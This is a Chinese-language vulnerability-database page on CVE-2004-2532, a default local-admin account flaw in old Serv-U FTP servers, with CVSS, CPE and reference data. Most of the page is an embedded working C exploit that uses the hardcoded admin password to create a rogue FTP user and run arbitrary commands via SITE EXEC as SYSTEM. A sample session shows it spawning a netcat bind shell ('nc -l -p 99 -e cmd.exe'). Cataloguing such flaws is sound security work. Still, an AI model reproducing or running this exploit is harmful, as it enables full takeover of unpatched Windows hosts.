CVE-2004-2532
CVSS10.0
发布时间 :2004-12-31 00:00:00
修订时间 :2010-04-27 15:28:18
NMCOE    

[原文]Serv-U FTP server before 5.1.0.0 has a default account and password for local administration, which allows local users to execute arbitrary commands by connecting to the server using the default administrator account, creating a new user, logging in as that new user, and then using the SITE EXEC command.


[CNNVD]RhinoSoft Serv-U FTP Server默认管理帐户漏洞(CNNVD-200412-693)

        Serv-U FTP server 5.1.0.0以前的版本具有本地管理的默认账户和密码,本地用户通过使用默认的管理器账户连接到服务器,创建一个新用户,以该新用户身份登录,然后使用SITE EXEC命令从而执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-255 [凭证管理]

- CPE (受影响的平台与产品)

cpe:/a:serv-u:serv-u:4.1.0.3Serv-U 4.1.0.3
cpe:/a:serv-u:serv-u:4.0.0.4Serv-U 4.0.0.4
cpe:/a:serv-u:serv-u:4.1.0.0Serv-U 4.1.0.0
cpe:/a:serv-u:serv-u:3.1.0.3Serv-U 3.1.0.3
cpe:/a:serv-u:serv-u:3.1.0.0Serv-U 3.1.0.0
cpe:/a:serv-u:serv-u:5.0.0.9Serv-U 5.0.0.9
cpe:/a:serv-u:serv-u:3.0.0.16Serv-U 3.0.0.16
cpe:/a:serv-u:serv-u:3.1.0.1Serv-U 3.1.0.1
cpe:/a:serv-u:serv-u:3.0.0.17Serv-U 3.0.0.17
cpe:/a:serv-u:serv-u:5.0.0.11Serv-U 5.0.0.11
cpe:/a:serv-u:serv-u:5.0.0.0Serv-U 5.0.0.0
cpe:/a:serv-u:serv-u:5.0.0.4Serv-U 5.0.0.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2532
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2532
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-693
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/16925
(UNKNOWN)  XF  servu-default-admin-account(16925)
http://www.securityfocus.com/bid/10886
(UNKNOWN)  BID  10886
http://www.osvdb.org/8877
(UNKNOWN)  OSVDB  8877
http://archives.neohapsis.com/archives/fulldisclosure/2004-08/0216.html
(UNKNOWN)  FULLDISC  20040808 Serv-U 3.x, 4.x, 5.x local privilege escalation vulnerability

- 漏洞信息

RhinoSoft Serv-U FTP Server默认管理帐户漏洞
危急 设计错误
2004-12-31 00:00:00 2010-04-27 00:00:00
本地  
        Serv-U FTP server 5.1.0.0以前的版本具有本地管理的默认账户和密码,本地用户通过使用默认的管理器账户连接到服务器,创建一个新用户,以该新用户身份登录,然后使用SITE EXEC命令从而执行任意命令。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (381)

Serv-U 3x - 5.x Local Privilege Escalation Exploit (EDBID:381)
windows local
2004-08-08 Verified
0 Andrés Acunha
[点击下载] [点击下载]
/*
 * Hax0rcitos proudly presents
 * Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
 *
 * All Serv-u Versions have default Login/password for local Administration.
 * This account is only available to connect in the loopback interface, so a
 * local user will be able to connect to Serv-u with this account and create
 * an ftp user with execute rights. after the user is created, just connect
 * to the ftp server and execute a raw "SITE EXEC" command. the program will
 * be execute with SYSTEM privileges.
 *
 * Copyright (c) 2003-2004  Haxorcitos com . All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 *
 * Date:   10/2003
 * Author: Andrés Tarascó Acunha
 *
 * Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
 *
 * Tested Against Serv-u 4.x and v5.1.0.0

         G:\exploit\serv-U\local>whoami
        INSANE\aT4r

        G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
        Serv-u >3.x Local Exploit by Haxorcitos

        <220 Serv-U FTP Server v5.0 for WinSock ready...
        >USER LocalAdministrator
        <331 User name okay, need password.
        ******************************************************
        >PASS #l@$ak#.lk;0@P
        <230 User logged in, proceed.
        ******************************************************
        >SITE MAINTENANCE
        ******************************************************
        [+] Creating New Domain...
        <200-DomainID=3
        220 Domain settings saved
        ******************************************************
        [+] Domain Haxorcitos:3 Created
        [+] Setting New Domain Online
        <220 Server command OK
        ******************************************************
        [+] Creating Evil User
        <200-User=haxorcitos
        200 User settings saved
        ******************************************************
        [+] Now Exploiting...
        >USER haxorcitos
        <331 User name okay, need password.
        ******************************************************
        >PASS whitex0r
        <230 User logged in, proceed.
        ******************************************************
        [+] Now Executing: nc -l -p 99 -e cmd.exe
        <220 Domain deleted
        ******************************************************
         G:\exploit\serv-U\local>nc localhost 99
        Microsoft Windows XP [Versión 5.1.2600]
        (C) Copyright 1985-2001 Microsoft Corp.

        C:\>whoami
        whoami
        NT AUTHORITY\SYSTEM
         C:\>
  */

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <io.h>
#include <process.h>

//Responses
#define BANNER                  "220 "
#define USEROK                  "331 User name okay"
#define PASSOK                  "230 User logged in, proceed."
#define ADMOK                   "230-Switching to SYSTEM MAINTENANCE mode."
#define DOMAINID                "200-DomainID="
//Commands

#define XPLUSER                    "USER haxorcitos\r\n"
#define XPLPASSWORD                "PASS whitex0r\r\n"
#define USER                    "USER LocalAdministrator\r\n"
#define PASSWORD                "PASS #l@$ak#.lk;0@P\r\n"

#define MAINTENANCE             "SITE MAINTENANCE\r\n"
#define EXIT                    "QUIT\r\n"
char newdomain[]="-SETDOMAIN\r\n"
                 "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
		 "-TZOEnable=0\r\n"
		 " TZOKey=\r\n";
/*               "-DynDNSEnable=0\r\n"
                 " DynIPName=\r\n";
*/
char deldomain[]="-DELETEDOMAIN\r\n"
                 "-IP=0.0.0.0\r\n"
                 " PortNo=2121\r\n";

char newuser[] =
                "-SETUSERSETUP\r\n"
                "-IP=0.0.0.0\r\n"
                "-PortNo=2121\r\n"
                "-User=haxorcitos\r\n"
                "-Password=whitex0r\r\n"
                "-HomeDir=c:\\\r\n"
                "-LoginMesFile=\r\n"
                "-Disable=0\r\n"
                "-RelPaths=1\r\n"
                "-NeedSecure=0\r\n"
                "-HideHidden=0\r\n"
                "-AlwaysAllowLogin=0\r\n"
                "-ChangePassword=0\r\n"
                "-QuotaEnable=0\r\n"
                "-MaxUsersLoginPerIP=-1\r\n"
                "-SpeedLimitUp=0\r\n"
                "-SpeedLimitDown=0\r\n"
                "-MaxNrUsers=-1\r\n"
                "-IdleTimeOut=600\r\n"
                "-SessionTimeOut=-1\r\n"
                "-Expire=0\r\n"
                "-RatioUp=1\r\n"
                "-RatioDown=1\r\n"
                "-RatiosCredit=0\r\n"
                "-QuotaCurrent=0\r\n"
                "-QuotaMaximum=0\r\n"
                "-Maintenance=None\r\n"
                "-PasswordType=Regular\r\n"
                "-Ratios=None\r\n"
                " Access=c:\\|RELP\r\n";

#define localport 43958
#define localip "127.0.0.1"

char cadena[1024];
int rec,domain;
/******************************************************************************/

void ParseCommands(int sock, char *data, int ShowSend, int showResponses,
char *response) {
 send(sock,data,strlen(data),0);
 if (ShowSend) printf(">%s",data);
 Sleep(100);
 do {
         rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
         if (rec<=0) return;
         if (showResponses) printf("<%s",cadena);
         if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0)
                domain=atoi(cadena+strlen(DOMAINID));
 //} while (strncmp(cadena,response,strlen(response))!=0);
 } while (strstr(cadena,response)==NULL);
  printf("******************************************************\r\n");
}
/******************************************************************************/
int main(int argc, char* argv[])
{
	WSADATA ws;
        int sock,sock2;

        struct sockaddr_in haxorcitos;
        struct sockaddr_in xpl;

printf("Serv-u >3.x Local Exploit by Haxorcitos\r\n\r\n");
if (argc<2) {
        printf("USAGE:   ServuLocal.exe \"command\"\r\n");
        printf("Example: ServuLocal.exe \"nc.exe -l -p 99 -e cmd.exe\"");
         return(0);
}

        if	(WSAStartup( MAKEWORD(2,2), &ws )!=0) {
		printf(" [-] WSAStartup() error\n");
		exit(0);
	}

	haxorcitos.sin_family = AF_INET;
	haxorcitos.sin_port = htons(localport);
	haxorcitos.sin_addr.s_addr = inet_addr(localip);
        sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
        connect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos));
        rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
        printf("<%s",cadena);

        ParseCommands(sock,USER,1,1,USEROK);
        ParseCommands(sock,PASSWORD,1,1,PASSOK);
        ParseCommands(sock,MAINTENANCE,1,0,"230 ");

        printf("[+] Creating New Domain...\r\n");
        ParseCommands(sock,newdomain,0,1,BANNER);
        printf("[+] Domain Haxorcitos:%i Created\n",domain);

/* Only for v5.x
        printf("[+] Setting New Domain Online\r\n");
        sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n
Command=DomainOnline\r\n",domain);
        ParseCommands(sock,cadena,0,1,BANNER);
*/
        printf("[+] Creating Evil User\r\n");
        ParseCommands(sock,newuser,0,1,"200 ");
        Sleep(1000);

        printf("[+] Now Exploiting...\r\n");
	xpl.sin_family = AF_INET;
	xpl.sin_port = htons(2121);
	xpl.sin_addr.s_addr = inet_addr(localip);
        sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
        connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl));
        rec=recv(sock2,cadena,sizeof(cadena),0); cadena[rec]='\0';
        ParseCommands(sock2,XPLUSER,1,1,USEROK);
        ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK);
        printf("[+] Now Executing: %s\r\n",argv[1]);
        sprintf(cadena,"site exec %s\r\n",argv[1]);
        send(sock2,cadena,strlen(cadena),0);
        shutdown(sock2,SD_BOTH);
        Sleep(100);
        ParseCommands(sock,deldomain,0,1,BANNER);
        send(sock,EXIT,strlen(EXIT),0);
        shutdown(sock,SD_BOTH);
        closesocket(sock);
        closesocket(sock2);

        return 0;
}

// milw0rm.com [2004-08-08]
		

- 漏洞信息

8877
Serv-U FTP Server Default Account Local System Privilege Escalation
Local Access Required, Local / Remote Authentication Management
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

Serv-U contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when an attacker uses Serv-U's default administration account to create an FTP user account capable of executing commands with NT AUTHORITY\SYSTEM privileges. This flaw may lead to a loss of integrity.

- 时间线

2004-08-08 Unknow
2004-08-08 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站